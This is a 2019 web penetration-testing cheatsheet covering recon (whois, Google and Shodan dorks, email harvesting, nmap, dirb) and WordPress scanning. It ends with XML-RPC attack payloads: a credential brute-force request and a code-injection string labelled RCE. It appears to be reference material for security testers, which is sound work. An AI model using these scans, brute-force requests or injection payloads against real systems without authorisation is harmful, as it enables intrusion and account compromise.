[ Home ] [ Writeups ] [ Papers ] [ Cheatsheets ] [ About ]

.:: Web Pentest ::.

~ Cheatsheet ~
cabir - Web Pentest
Title : CheatSheet Pentest Web
Author : cabir
Date : Sept 20, 2019

Table of Contents

1. [Recon] 1. Passive 2. Active 2. [CMS] 1. WordPress _______________________________________


## Passive WhoIs of the host to collect informations on the domain, the owner and the IP whois Dorks intitle: inurl: intext: define: site: phonebook: maps: book: info: movie: related: link: Shodan & Shodan Dork city: Find devices in a particular city. city:"Bangalore" country: Find devices in a particular country. country:"IN" geo: Find devices by giving geographical coordinates. geo:"56.913055,118.250862" hostname: Find devices matching the hostname. server: "gws" hostname:"google" net: Find devices based on an IP address or /x CIDR. net: os: Find devices based on operating system. os:"windows 7" port: Find devices based on open ports. proftpd port:21 before/after: Find devices before or after between a given time. apache after:22/02/2009 before:14/3/2010 Mail Search TheHarvester: https://github.com/laramies/theHarvester.git SimplyEmail: https://github.com/SimplySecurity/SimplyEmail.git LinkedIn linkedin2username: https://github.com/initstring/linkedin2username.git


Ping to get IP of the target ping -c 3 nmap scan port and determine service & OS nmap [ip] -sS -Sv -v -O -o dirb.txt -O: Enable OS detection -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans -sV: Probe open ports to determine service/version info -v: Verbose dirb : directory bruteforce dirb --url [https://domain_name] /usr/share/dirb/wordlists/big.txt -o dirb.txt {-X /usr/share/dirb/wordlist/extensions_common.txt} ____


Tools : WPScan docker pull wpscanteam/wpscan docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --plugins-detection aggressive [-U users.txt] -e vp,vt,tt,cb,dbe -o wpscan_results.txt -f cli-no-colour WhatWeb https://github.com/urbanadventurer/WhatWeb whatweb example.com -a=3 [--cookie='name1=a; name2=b'] -l --color=never -v > whatweb_results.txt



XML-RPC of WordPress is a way to normalize communication between differents systems. It uses HTTP as a trasnport mechanisme and XML as an encode mechanisme who permits transmission of a big amount of data.

List all available methods : <methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall> Possible Attacks : - BruteForce : <methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>username</value></param> <param><value>password</value></param> </params> </methodCall> - RCE : <methodCall> <methodName>test.method</methodName> <params> <param> <value><name>’,”)); phpinfo(); exit;/<b></name></value> </param> </params> </methodCall>
[ Home ] [ Writeups ] [ Papers ] [ Cheatsheets ] [ About ]